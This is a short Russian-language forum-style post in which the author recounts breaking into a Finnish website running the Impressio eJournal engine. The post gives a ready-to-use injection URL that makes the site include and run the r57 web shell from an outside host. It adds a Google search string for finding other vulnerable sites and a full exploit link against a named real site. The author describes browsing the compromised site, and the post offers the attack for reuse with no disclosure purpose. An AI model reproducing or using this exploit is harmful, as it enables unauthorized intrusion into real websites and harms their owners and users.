В общем искал я недели 2 назад какую-то инфу в гугле, и случайно наткнулся на один финский сайт. В шапке сайта была надпись: “Warning: end(): Passed variable is not an array or object in /var/www/sasem-dev/project/class-1.24/common/interfaces/class.IBrowsing.php on line 21”
Казалось-бы нечего интересного, но тут я обратил внимание на адресную строку, она была такого вида:
site.net/…/index.php?action%5B%5D=IBrowsing::goOneFolderBack( 'browsingpage')
Тут я решил сформировать запрос такого типа:
site.net/…/index.php?action%5B%5D=IBrowsing::gotoFolder(inclu de%20('http://rst.void.ru/download/r57shell.txt')) Шелл успешно запустился, и я начал капаться в дебрях этого сайта…
Мне стало очень интересно, а не в движке-ли эта бага? Я полез на главную страницу в поисках улик. В крайнем правом углу красовалась надпись …Impressio eJournal, я решил в гугле вбить
Powered by Impressio eJournal. Он мне выплюнул несколько сайтов, с этим движком, кстате финских.
Так-же можно вбить в Гугле inurl:"index.php?action%5B%5D=IBrowsing::"
Интересно, что про багу в этом движке, да и вообще про движок в инете нечего нет.
Вот пример
http://www.etwinning.fi/index.php?action%5B%5D=IBrowsing::gotoFolder(inclu de%20('http://rst.void.ru/download/r57shell.txt'))